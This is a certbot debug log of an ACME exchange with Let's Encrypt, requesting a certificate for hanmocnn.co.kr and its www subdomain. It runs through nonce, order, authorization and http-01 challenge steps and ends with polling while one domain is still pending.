|
2026-02-14 23:56:04,106:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
|
||||||
|
2026-02-14 23:56:04,633:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
|
||||||
|
2026-02-14 23:56:04,634:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:04 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 1033
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"Gc3gBymDyPY": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
|
||||||
|
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
|
||||||
|
"meta": {
|
||||||
|
"caaIdentities": [
|
||||||
|
"letsencrypt.org"
|
||||||
|
],
|
||||||
|
"profiles": {
|
||||||
|
"classic": "https://letsencrypt.org/docs/profiles#classic",
|
||||||
|
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
|
||||||
|
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
|
||||||
|
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
|
||||||
|
},
|
||||||
|
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
|
||||||
|
"website": "https://letsencrypt.org"
|
||||||
|
},
|
||||||
|
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
|
||||||
|
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
|
||||||
|
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
|
||||||
|
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
|
||||||
|
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:04,635:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for hanmocnn.co.kr and www.hanmocnn.co.kr
|
||||||
|
2026-02-14 23:56:04,655:DEBUG:acme.client:Requesting fresh nonce
|
||||||
|
2026-02-14 23:56:04,655:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
|
||||||
|
2026-02-14 23:56:04,815:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
|
||||||
|
2026-02-14 23:56:04,816:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:04 GMT
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: NeKnt8TGestOb4Fc1JYyinutgiAntZDFY_yp1ktjxi2tcT3bfYw
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
|
||||||
|
2026-02-14 23:56:04,816:DEBUG:acme.client:Storing nonce: NeKnt8TGestOb4Fc1JYyinutgiAntZDFY_yp1ktjxi2tcT3bfYw
|
||||||
|
2026-02-14 23:56:04,817:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "hanmocnn.co.kr"\n },\n {\n "type": "dns",\n "value": "www.hanmocnn.co.kr"\n }\n ]\n}'
|
||||||
|
2026-02-14 23:56:04,823:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2VzdE9iNEZjMUpZeWludXRnaUFudFpERllfeXAxa3RqeGkydGNUM2JmWXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
|
||||||
|
"signature": "juewpbMaBZNaMfU9dqjamSNFoI-PzgktmhJyw43wSZ5OThiGI7N6iTuEJBKZ8hLFW6fcOzQP3cToFaJrtCwOKxu7KXy1k3wCleq6z99OtmHXACZHsaPrPZ-mXMicz8e1vS-6h1oR2zg94g-gHelbWesHEb6M60Rn8EjK4DFm8SvIaFwBquEsLFRrekm0fwYNqohUGgTCL7abdUes9Yw_6siofGMzU0fMcXRA_s114rGwFAPQ-6jqqWNwlYVgBGY--3BEl3OwwZ0-pQOSnc7t8_rU5e6JZr_hDSU_0zogGuAsuy644cQMsa-_nSx92ZTmPX_XzRxS7YGDBajbXMi_Ow",
|
||||||
|
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImhhbm1vY25uLmNvLmtyIgogICAgfSwKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInd3dy5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0"
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:05,027:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 497
|
||||||
|
2026-02-14 23:56:05,028:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 201
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:04 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 497
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480375535806
|
||||||
|
Replay-Nonce: 4AH-2vvBT2vTYIMOrxGiTtOKUqEylQbuZuNcckoFVLrqiF3jx9Y
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:56:04Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "www.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386",
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480375535806"
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:05,028:DEBUG:acme.client:Storing nonce: 4AH-2vvBT2vTYIMOrxGiTtOKUqEylQbuZuNcckoFVLrqiF3jx9Y
|
||||||
|
2026-02-14 23:56:05,028:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:56:05,033:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QlQydlRZSU1PcnhHaVR0T0tVcUV5bFFidVp1TmNja29GVkxycWlGM2p4OVkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
|
||||||
|
"signature": "pbWBe85DpxKfn_lPIjFwvF1jfmQ4abuYD0ndP5kNoZ5TLTUhA31C3vEuxlsovLJgyC8Ulmm7Bgx4WeyEMT6qjtxhy9j5Kykk-7wRszhAuRdyz-lsifs8J9-yxoE3C9IkglmljKeTmW_ApNEwwjaT2byaaET9vIIJsabfromIWewPAYdSfzbqDPlEk3nZyH9rtfOFhz8Rj3-v0OjT_asvc8pwOrVjGO3gOtLQG4K0eZHiE555xsZvZB__-F9hPs0ZYFPlglrDTqw5XKJQo7ufYSZainTqGIGWUX-jVz1WgQRstGfQr6VwhH0oc1EekFl95l_MtKq18gcmO_D6BJpLdQ",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:05,197:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 777
|
||||||
|
2026-02-14 23:56:05,198:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:05 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 777
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: 4AH-2vvBHbnqIb9LyBaA8P9msdY-ehXuVEPrNk20KbauKrGshqo
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "www.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-03-16T22:37:07Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
|
||||||
|
"status": "valid",
|
||||||
|
"validated": "2026-02-14T22:37:00Z",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
|
||||||
|
"validationRecord": [
|
||||||
|
{
|
||||||
|
"url": "http://www.hanmocnn.co.kr/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
|
||||||
|
"hostname": "www.hanmocnn.co.kr",
|
||||||
|
"port": "80",
|
||||||
|
"addressesResolved": [
|
||||||
|
"222.117.41.51"
|
||||||
|
],
|
||||||
|
"addressUsed": "222.117.41.51"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:05,198:DEBUG:acme.client:Storing nonce: 4AH-2vvBHbnqIb9LyBaA8P9msdY-ehXuVEPrNk20KbauKrGshqo
|
||||||
|
2026-02-14 23:56:05,198:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:56:05,203:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QkhibnFJYjlMeUJhQThQOW1zZFktZWhYdVZFUHJOazIwS2JhdUtyR3NocW8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
|
||||||
|
"signature": "tz2Y086S4EaArR69HbUgLQD_29PSdN1N-KFP_-oLruFKzk-JHDDAYfdH-AhNXZY_hJFO-aW3WedTTy2ZCbIY6193cKJZuK0iNdJPPRRRhXS4anYzhvVqZrtsgM963naPim51-HwmIE1jo2ESDQGYk-0sMk4AnLsDtUFqk_uO8iRIFPKfX2Hk7-rzb8-ctq01lnHQ_GGpAbftWCd8OCOsaKmsDKe1AWAF3pMEi9Na7FnaNiQRO-JhDfj_HnAfJSP5B4oqh_ty71CP5OosPD1sb52-ROrEnHJWK5HCJt9t-1quhiKWFBfmBJ3FNCU4f8-aGyu7tdKxa6ta6ZEBk9HyUA",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:05,367:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822
|
||||||
|
2026-02-14 23:56:05,368:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:05 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 822
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: 4AH-2vvBzHJaud8ZfhX0LUR1BTrdy4GJ8sNj5NkVg96bgxLtfuY
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:56:04Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:05,368:DEBUG:acme.client:Storing nonce: 4AH-2vvBzHJaud8ZfhX0LUR1BTrdy4GJ8sNj5NkVg96bgxLtfuY
|
||||||
|
2026-02-14 23:56:05,368:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'}
|
||||||
|
2026-02-14 23:56:05,369:INFO:certbot._internal.auth_handler:Performing the following challenges:
|
||||||
|
2026-02-14 23:56:05,369:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='hanmocnn.co.kr')
|
||||||
|
2026-02-14 23:56:05,369:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
|
||||||
|
2026-02-14 23:56:05,369:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
|
||||||
|
2026-02-14 23:56:05,371:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0
|
||||||
|
2026-02-14 23:56:05,372:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{}'
|
||||||
|
2026-02-14 23:56:05,376:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QnpISmF1ZDhaZmhYMExVUjFCVHJkeTRHSjhzTmo1TmtWZzk2Ymd4THRmdVkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2L1JNeEFBZyJ9",
|
||||||
|
"signature": "Ov4Fc1fM9a-2y12yEwh75oXuYp87xbKqQ_cGIG7P63r6MjbmmuLeZd5COLBfgrgjNJRgAOr1M32zNEdJWnZULT3cH-xGb6uipmCh3kN3Pdhqskbi4yUfkk16cI8zs9Lf5iPEK6PxhdBWxNA_-xY8zVqFVJTBGsliXxmGSGUJaRPWKFuZHutJRv66gHOJeLGcaVUbAbpOPGPRFh-0IsPc0yZqj-wN7BZwemY2b9x_WboVK7M2GeJwp8UAWDNzX0i7vwrOCYbqs8Eek4nNAd9xwpJUOCR8Y2dMRuZ9_KLJ92p7FlK1P5-dkOxMwpm4-Ss4UkYCTPsa37P8cptqoNeUaw",
|
||||||
|
"payload": "e30"
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:05,542:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658791959956/RMxAAg HTTP/1.1" 200 195
|
||||||
|
2026-02-14 23:56:05,543:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:05 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 195
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956>;rel="up"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg
|
||||||
|
Replay-Nonce: 4AH-2vvBjNLPyColdbElV57vl1FNhl30mNx5o-RvY8R6PJo2R68
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:05,543:DEBUG:acme.client:Storing nonce: 4AH-2vvBjNLPyColdbElV57vl1FNhl30mNx5o-RvY8R6PJo2R68
|
||||||
|
2026-02-14 23:56:05,544:INFO:certbot._internal.auth_handler:Waiting for verification...
|
||||||
|
2026-02-14 23:56:06,544:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:56:06,549:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QmpOTFB5Q29sZGJFbFY1N3ZsMUZOaGwzMG1OeDVvLVJ2WThSNlBKbzJSNjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
|
||||||
|
"signature": "qN8X02M3qa1Ed8e8wWUDDn79drKvTl5NtGAiGpEmIIFEeuPoAmrppUeoo6UVjHoV2eIiYbI4tUTNIVbFYjffOkp9JlG5od3hSIix65LeFHPl7-9hg19zKFJiQma53yVbub7OFGeFqFj-IrXb8-5eiEy2mgxZ0aMznirCicV_zp_bLsH36z-E_bU1fFaNMPMTEwjqC8pudu87REDCqyTYepiezGO4rgjDda4Ddcb2zF2WpmAEasSSUx1cTwgmzs4kTT6RZFedefRw730Ecri9vwGi7QuvHHvZ_HywdGejwcMQ8bRDxSBssJXJJOsw5AHfkktnbIR3UtZ-sbBOT9_A3g",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:06,724:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 777
|
||||||
|
2026-02-14 23:56:06,725:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:06 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 777
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: NeKnt8TG1OrA2e5G5sPzCyRvfzoUiUWFZAniIMDJOqe2pcuVeR0
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "www.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-03-16T22:37:07Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
|
||||||
|
"status": "valid",
|
||||||
|
"validated": "2026-02-14T22:37:00Z",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
|
||||||
|
"validationRecord": [
|
||||||
|
{
|
||||||
|
"url": "http://www.hanmocnn.co.kr/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
|
||||||
|
"hostname": "www.hanmocnn.co.kr",
|
||||||
|
"port": "80",
|
||||||
|
"addressesResolved": [
|
||||||
|
"222.117.41.51"
|
||||||
|
],
|
||||||
|
"addressUsed": "222.117.41.51"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:06,725:DEBUG:acme.client:Storing nonce: NeKnt8TG1OrA2e5G5sPzCyRvfzoUiUWFZAniIMDJOqe2pcuVeR0
|
||||||
|
2026-02-14 23:56:06,726:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:56:06,730:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhURzFPckEyZTVHNXNQekN5UnZmem9VaVVXRlpBbmlJTURKT3FlMnBjdVZlUjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
|
||||||
|
"signature": "qt11UnIYlgfU1E5jyT6qBNkGSoLXiZdyHKs3sQXhWI9yG363SPzQ78zH0oElA6LJgJgAS0mhkfZZtfU1lTzBrHZ_XLx5S0q-KQ-GZmcl-BOwB42l1jR13Bg6kJXowtDsqGZpZ0qoHG3rKqAUUchFQpX3NAPIqs15598OlpOBRG17MP8cF6HZJMWZsPIh4GGUDReGFRQdRjKhbr0ep3dnyWDIBdLD0LIrOUAMd5absl4Jn9Vd4nolz50iaFpZ88HxjOOx_OmeCOQ4v3ycagZ8dJLSSvT_PBMLlbH3_pyPVrBG5rafoph9pxQ5YM3oNWRVMXxmJqU_qKrr3k7LEjifAg",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:06,894:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822
|
||||||
|
2026-02-14 23:56:06,895:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:06 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 822
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: 4AH-2vvBYLdUOTkkarVTTilYf8jHyGJhY1FlIsWUvBpM4NLDU2k
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:56:04Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:06,895:DEBUG:acme.client:Storing nonce: 4AH-2vvBYLdUOTkkarVTTilYf8jHyGJhY1FlIsWUvBpM4NLDU2k
|
||||||
|
2026-02-14 23:56:06,896:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'}
|
||||||
|
2026-02-14 23:56:09,897:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:56:09,901:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QllMZFVPVGtrYXJWVFRpbFlmOGpIeUdKaFkxRmxJc1dVdkJwTTROTERVMmsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
|
||||||
|
"signature": "pjocFNC1rCf2Jkfu67Zw3Smbc0HZTvM6bynfejd_aK7NWjRvp1EMvfO_q3cMjf0B_R1S25UEc3SdvQO25fQzspYAvn-7VY-CO29v_CVW1yoriJmh9qagA8_ooC_de9cJfhwNh2YPZwecMtGCUgB9hZjUqTE89bBjtCAFTgsdf-b37WV5DFET3KpTg29VAurpW2YmMth21ueSmxdiB-ZyxJC1j4kmVaefSilRoeUkqBeAzFX_XdPP9gvoSk5XbDL24jte1XCbgiEUloUot0qveRNkGEu_anFWbGNIKTPqUZeeb8hK-xlSmUAFP3l2_W1tFa32nLqJ0XOKKWm3Kh4EVw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
